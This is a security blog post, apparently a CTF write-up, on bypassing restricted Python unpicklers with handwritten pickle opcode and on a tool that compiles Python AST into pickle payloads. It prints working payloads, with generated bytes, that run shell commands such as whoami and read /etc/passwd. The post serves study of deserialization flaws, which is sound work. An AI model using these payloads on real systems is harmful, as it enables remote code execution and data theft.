Constructing pickle opcode via the Python AST

Posted by tzul at 2020-03-07

0x00 Preface

This post summarizes some tricks for handwriting pickle, by analyzing several challenges from this year that required a bypass through handwritten pickle opcode, and then shows how to generate pickle opcode automatically by traversing the Python AST.

0x01 Brief introduction to pickle

There is already plenty of material online, so I will not add more redundant information to the Internet.

Only a few characteristics of pickle are summarized here:

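- It is a very simple stack language; the basic types it builds natively are str, int, float, list, tuple, dict and so on.
- The virtual machine state is just a memo and a stack, implemented as a dict and a list.
- It can call any callable it can obtain.
- Globals are imported through _Unpickler.find_class; by default find_class is roughly getattr(__import__(module), name).
- In the text protocol, operands are terminated by \n.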
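To get a feel for the stack language, the standard library's pickletools module can list the opcodes of any pickle. The snippet below is only an illustration: the sample value is arbitrary, and protocol 0 is chosen because it is the text protocol used by the handwritten payloads in this post.

```python
import pickle
import pickletools

# Arbitrary sample value built only from the basic types.
value = [1, "a", (2.5, {"k": None})]
data = pickle.dumps(value, protocol=0)

# genops yields (opcode, argument, position) for every instruction.
for opcode, arg, pos in pickletools.genops(data):
    print(pos, opcode.name, repr(arg))
```

Every pickle ends with STOP (the "." byte), which pops the top of the stack and returns it as the result.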

0x02 Opcode overview

The common pickle opcodes are worth knowing; the complete list can be found in $PYTHON/Lib/. Among them, BUILD updates the object's __dict__, while GLOBAL and INST go through find_class.

The corresponding implementations can be read in the load_* member functions of pickle._Unpickler. Here are two common ones:

pop_mark pops all the elements above MARK, that is (, into a list, which is then pushed back onto the stack. So a list needs to be constructed like this: (I0\nI1\nl
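This can be checked directly with pickle.loads. The only thing added to the fragment above is the trailing "." (STOP), which every complete pickle needs.

```python
import pickle

# MARK, INT 0, INT 1, LIST, STOP
payload = b"(I0\nI1\nl."
result = pickle.loads(payload)
print(result)
```

The two integers pushed after the MARK are collected into one list, which is what STOP returns.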

After reading the INST opcode, the unpickler reads two more operands (module and name), calls find_class on them, then pops the arguments above MARK from the stack and calls the resulting callable with them to instantiate it. So the payload is constructed as (S'ls'\nios\nsystem\n.
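The same shape can be tried safely by swapping os.system for a harmless callable. In this sketch builtins.len stands in for the target (my substitution, not part of the original payload), so the string above the MARK becomes its argument.

```python
import pickle

# MARK, STRING 'abc', INST builtins.len, STOP
payload = b"(S'abc'\nibuiltins\nlen\n."
result = pickle.loads(payload)
print(result)
```

Because the argument tuple is not empty, the callable is simply invoked with it, so any callable that find_class can reach will do, not just classes.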

0x03 What the official demo restricts

The safe deserialization example in the official documentation subclasses pickle.Unpickler and overrides its find_class method.

The original behavior of the parent class is to import the module into the sys.modules cache (not into the global or local scope) and then getattr the value from it, so once the method is overridden, module and name can be restricted.
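For reference, here is a sketch closely following the "Restricting Globals" example in the pickle documentation. The whitelist contents and the helper name restricted_loads are taken from that example rather than from any particular challenge.

```python
import builtins
import io
import pickle

SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow a few safe names from builtins.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def restricted_loads(data):
    """Like pickle.loads(), but globals go through the whitelist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


allowed = restricted_loads(pickle.dumps([1, 2, range(15)]))

try:
    restricted_loads(b"cos\nsystem\n(S'echo hello world'\ntR.")
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

The os.system payload is rejected at the GLOBAL opcode, before anything is called.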


Which opcodes call find_class?

    GLOBAL: c
    INST: i
    and, in protocol 4, STACK_GLOBAL: \x93  # same as GLOBAL but using names on the stacks
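A small experiment makes this visible: override find_class only to record its arguments, then feed one payload per opcode. TracingUnpickler and the three payloads are made up for this illustration; each of them resolves builtins.len.

```python
import io
import pickle


class TracingUnpickler(pickle.Unpickler):
    """Hypothetical helper: records every find_class call."""

    def __init__(self, data):
        super().__init__(io.BytesIO(data))
        self.seen = []

    def find_class(self, module, name):
        self.seen.append((module, name))
        return super().find_class(module, name)


payloads = {
    "GLOBAL": b"cbuiltins\nlen\n.",
    "INST": b"(S'abc'\nibuiltins\nlen\n.",
    # PROTO 4, two SHORT_BINUNICODE strings, STACK_GLOBAL, STOP
    "STACK_GLOBAL": b"\x80\x04\x8c\x08builtins\x8c\x03len\x93.",
}

traces = {}
for opcode_name, payload in payloads.items():
    unpickler = TracingUnpickler(payload)
    unpickler.load()
    traces[opcode_name] = unpickler.seen
    print(opcode_name, unpickler.seen)
```

All three go through the overridden method, so a find_class filter sees them; what it does not see is discussed next.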

However, the find_class restriction only filters the arguments of this one function; it does not hook functions such as __import__, so a call like eval('__import__(\'xx\')') is not restricted at all.
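A minimal sketch of that gap, assuming a filter that only checks the module name and lets all of builtins through (BuiltinsOnlyUnpickler is a hypothetical example, and math.sqrt is used as a harmless stand-in for a dangerous call):

```python
import io
import pickle


class BuiltinsOnlyUnpickler(pickle.Unpickler):
    """Hypothetical filter: only the module name is checked."""

    def find_class(self, module, name):
        if module != "builtins":
            raise pickle.UnpicklingError("forbidden module: " + module)
        return super().find_class(module, name)


def filtered_loads(data):
    return BuiltinsOnlyUnpickler(io.BytesIO(data)).load()


# Asking for math.sqrt directly is rejected by find_class ...
try:
    filtered_loads(b"cmath\nsqrt\n(I16\ntR.")
    direct_blocked = False
except pickle.UnpicklingError:
    direct_blocked = True

# ... but eval is a builtin, and the import inside the evaluated
# string never passes through find_class.
via_eval = filtered_loads(
    b"cbuiltins\neval\n(S'__import__(\"math\").sqrt(16)'\ntR.")
print(direct_blocked, via_eval)
```

The filter saw only ("builtins", "eval"); the import of math happened inside eval, out of its reach.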

0x04 Bypass method

Take Code_breaking as an example. The bypass works as follows:

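Here are a few points:

- The built-in functions live in the builtins module, so they can be reached as __import__('builtins').xx (in Python 2 the module is named __builtin__).
- __import__ itself lives in __builtins__, which can be obtained with globals()['__builtins__'].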

0x05 Automatic construction

Constructing payloads is easy, but writing these assembly-like instructions by hand is still tedious. We can find a way to automate the translation: Python source code => pickle opcode.

What we can do:

That is almost enough to handle the common constructions. To summarize, three kinds of single-line statements are supported:

0x06 Traversing AST nodes

Python's ast.NodeVisitor dispatches dynamically to the methods of a class according to the node type, a bit like what a metaclass does. We use it to traverse these three kinds of statements:


Pickler's __setitem__ implements the main parsing logic:


It covers the several lvalue and rvalue cases of the assignment statements above.
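To make the idea concrete, here is a much reduced sketch of such a translator. It is not the code from the repository: MiniCompiler, compile_source and the supported subset (name = expr, bare calls, return, with str and int constants and the GLOBAL pseudo-function) are my own simplifications, and it assumes Python 3.8+ where literals are ast.Constant nodes.

```python
import ast
import pickle


class MiniCompiler(ast.NodeVisitor):
    """Hypothetical sketch: a tiny Python subset to protocol-0 opcode."""

    def __init__(self):
        self.out = []        # opcode fragments, joined at the end
        self.memo = {}       # variable name -> pickle memo index
        self.next_index = 0  # next free memo slot

    def expr(self, node):
        """Emit opcode that leaves the value of `node` on the stack."""
        if isinstance(node, ast.Constant) and type(node.value) is str:
            self.out.append("S" + repr(node.value) + "\n")     # STRING
        elif isinstance(node, ast.Constant) and type(node.value) is int:
            self.out.append("I%d\n" % node.value)              # INT
        elif isinstance(node, ast.Name):
            self.out.append("g%d\n" % self.memo[node.id])      # GET
        elif isinstance(node, ast.Call):
            if isinstance(node.func, ast.Name) and node.func.id == "GLOBAL":
                module, name = (arg.value for arg in node.args)
                self.out.append("c%s\n%s\n" % (module, name))  # GLOBAL
            else:
                self.expr(node.func)
                self.out.append("(")                           # MARK
                for arg in node.args:
                    self.expr(arg)
                self.out.append("tR")                          # TUPLE, REDUCE
        else:
            raise NotImplementedError(ast.dump(node))

    def visit_Assign(self, node):
        # Only `name = <expr>` is handled in this sketch.
        (target,) = node.targets
        if not isinstance(target, ast.Name):
            raise NotImplementedError(ast.dump(target))
        self.expr(node.value)
        self.memo[target.id] = self.next_index
        self.out.append("p%d\n0" % self.next_index)            # PUT, POP
        self.next_index += 1

    def visit_Expr(self, node):
        self.expr(node.value)  # the result stays on the stack

    def visit_Return(self, node):
        if node.value is not None:
            self.expr(node.value)
        self.out.append(".")                                   # STOP


def compile_source(source):
    compiler = MiniCompiler()
    compiler.visit(ast.parse(source))
    return "".join(compiler.out).encode("ascii")


source = """
pow = GLOBAL('builtins', 'pow')
result = pow(2, 10)
return result
"""
opcode = compile_source(source)
print(opcode)
print(pickle.loads(opcode))
```

ast.parse accepts a top-level return because that check only happens at compile time, which is what lets the input files end with a bare return line. Attribute and subscript assignment, INST and the other cases seen in the tests below are left out of this sketch.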


Let's test it on several challenges from this year.

0x08 Code_breaking

    $ cat test/code_breaking
    getattr = GLOBAL('builtins', 'getattr')
    dict = GLOBAL('builtins', 'dict')
    dict_get = getattr(dict, 'get')
    globals = GLOBAL('builtins', 'globals')
    builtins = globals()
    __builtins__ = dict_get(builtins, '__builtins__')
    eval = getattr(__builtins__, 'eval')
    eval('__import__("os").system("whoami")')
    return
    $ python3 < test/code_breaking
    b'cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS\'get\'\ntRp2\n0cbuiltins\nglobals\np3\n0g3\n(tRp4\n0g2\n(g4\nS\'__builtins__\'\ntRp5\n0g0\n(g5\nS\'eval\'\ntRp6\n0g6\n(S\'__import__("os").system("whoami")\'\ntR.'

    $ cat test/SUCTF2019_guess_game_1
    Game = GLOBAL('guess_game.Game', 'Game')
    game = GLOBAL('guess_game', 'game')
    game.round_count = 10
    game.win_count = 10
    ticket = INST('guess_game.Ticket', 'Ticket', 6)
    return ticket
    $ python3 < test/SUCTF2019_guess_game_1
    b"cguess_game.Game\nGame\np0\n0cguess_game\ngame\np1\n0g1\n(N(S'round_count'\nI10\ndtbg1\n(N(S'win_count'\nI10\ndtb(I6\niguess_game.Ticket\nTicket\np4\n0g4\n."

Method two:

    $ cat test/SUCTF2019_guess_game_2
    ticket = INST('guess_game.Ticket', 'Ticket', 0)
    game = GLOBAL('guess_game', 'game')
    game.curr_ticket = ticket
    return ticket
    $ python3 < test/SUCTF2019_guess_game_2
    b"(I0\niguess_game.Ticket\nTicket\np0\n0cguess_game\ngame\np1\n0g1\n(N(S'curr_ticket'\ng0\ndtbg0\n."

    $ cat test/BalsnCTF2019_Pyshv1
    modules = GLOBAL('sys', 'modules')
    modules['sys'] = modules
    module_get = GLOBAL('sys', 'get')
    os = module_get('os')
    modules['sys'] = os
    system = GLOBAL('sys', 'system')
    system('whoami')
    return
    $ python3 < test/BalsnCTF2019_Pyshv1
    b"csys\nmodules\np0\n0g0\nS'sys'\ng0\nscsys\nget\np2\n0g2\n(S'os'\ntRp3\n0g0\nS'sys'\ng3\nscsys\nsystem\np5\n0g5\n(S'whoami'\ntR."

    $ cat test/BalsnCTF2019_Pyshv2
    __dict__ = GLOBAL('structs', '__dict__')
    builtins = GLOBAL('structs', '__builtins__')
    gtat = GLOBAL('structs', '__getattribute__')
    builtins['__import__'] = gtat
    __dict__['structs'] = builtins
    builtin_get = GLOBAL('structs', 'get')
    eval = builtin_get('eval')
    eval('open("/etc/passwd").read()')
    return
    $ python3 < test/BalsnCTF2019_Pyshv2
    b'cstructs\n__dict__\np0\n0cstructs\n__builtins__\np1\n0cstructs\n__getattribute__\np2\n0g1\nS\'__import__\'\ng2\nsg0\nS\'structs\'\ng1\nscstructs\nget\np5\n0g5\n(S\'eval\'\ntRp6\n0g6\n(S\'open("/etc/passwd").read()\'\ntR.'

    $ cat test/BalsnCTF2019_Pyshv3
    User = GLOBAL('structs', 'User')
    User.__set__ = User
    user = User(0, 0)
    User.privileged = user
    return user
    $ python3 < test/BalsnCTF2019_Pyshv3
    b"cstructs\nUser\np0\n0g0\n(N(S'__set__'\ng0\ndtbg0\n(I0\nI0\ntRp2\n0g0\n(N(S'privileged'\ng2\ndtbg2\n."

A few more points to note here:

An instance method is a class function with the instance itself automatically bound, and otherwise has exactly the same signature. A method fetched through the instance already has its first parameter bound, so it can be regarded as a curried version of the function.
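A quick illustration of that equivalence (the Greeter class is made up for the example):

```python
import functools


class Greeter:
    def __init__(self, name):
        self.name = name

    def greet(self, greeting):
        return "%s, %s" % (greeting, self.name)


g = Greeter("world")

bound = g.greet                                 # instance already bound
via_class = Greeter.greet(g, "hello")           # plain function, explicit self
via_bound = bound("hello")                      # first parameter pre-filled
via_partial = functools.partial(Greeter.greet, g)("hello")

print(via_class, via_bound, via_partial)
print(bound.__self__ is g, bound.__func__ is Greeter.greet)
```

functools.partial does by hand what attribute access on the instance does automatically.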

A class's __set__ method has to be defined on the class (normally when the class is defined), and the setter also has to be installed as a class member. A class member belongs to the class object, while an instance member is private to each instance (I also saw the owner of the Xianzhi (Prophet) group asking about this today).
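Both conditions can be seen in a small experiment. The classes below are invented for the illustration and have nothing to do with the challenge's structs module.

```python
class Recorder:
    """Data descriptor: __set__ is defined on the class."""

    def __set__(self, instance, value):
        instance.__dict__["seen"] = value  # intercept the assignment


class Plain:
    pass


plain = Plain()
plain.__set__ = lambda instance, value: None  # on the instance: ignored


class Holder:
    hooked = Recorder()  # class member, type defines __set__
    ignored = plain      # class member, but its type has no __set__


a = Holder()
a.hooked = 1             # routed through Recorder.__set__

b = Holder()
b.ignored = 2            # ordinary attribute assignment

c = Holder()
c.__dict__["local"] = Recorder()  # descriptor stored on the instance
c.local = 3              # not consulted: the instance entry is overwritten

print(a.__dict__, b.__dict__, c.__dict__)
```

Only the first case is intercepted, which is why the Pyshv3 payload sets both __set__ and privileged on the User class rather than on an instance.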

In Python 3, the class attribute cls.__dict__ is a mappingproxy object, which does not support direct modification such as cls.__dict__['x'] = 0. Therefore, when generating pickle opcode, I uniformly use the form (}(I0\nI1\ndtb. The reason lies in the load_build method in the pickle source code:

In fact, logically speaking, it would be enough for the first value of the tuple to be empty. However, import pickle actually loads the C implementation (the _pickle module), which differs from the function implementation listed here: it requires the first value to be a dict (or None).
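The effect of BUILD with a two-element state tuple can be reproduced on a throwaway class. In this sketch Target and LocalUnpickler are hypothetical; find_class is overridden only so that the payload resolves to the local class without needing an importable module. The state uses the (None, {...}) form that appears in the generated payloads above.

```python
import io
import pickle


class Target:
    pass


# Direct item assignment on the class __dict__ is refused.
try:
    Target.__dict__["x"] = 0
    direct_error = None
except TypeError as exc:
    direct_error = exc


class LocalUnpickler(pickle.Unpickler):
    """Hypothetical helper: every global resolves to Target."""

    def find_class(self, module, name):
        return Target


# GLOBAL, MARK, NONE, MARK, STRING 'x', INT 0, DICT, TUPLE, BUILD, STOP
payload = b"cdemo\nTarget\n(N(S'x'\nI0\ndtb."
result = LocalUnpickler(io.BytesIO(payload)).load()
print(type(direct_error).__name__, result.x)
```

The second element of the tuple is applied with setattr, so it works on a class even though its __dict__ is read-only.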


0x0b Repo address

The complete code is at

I love you!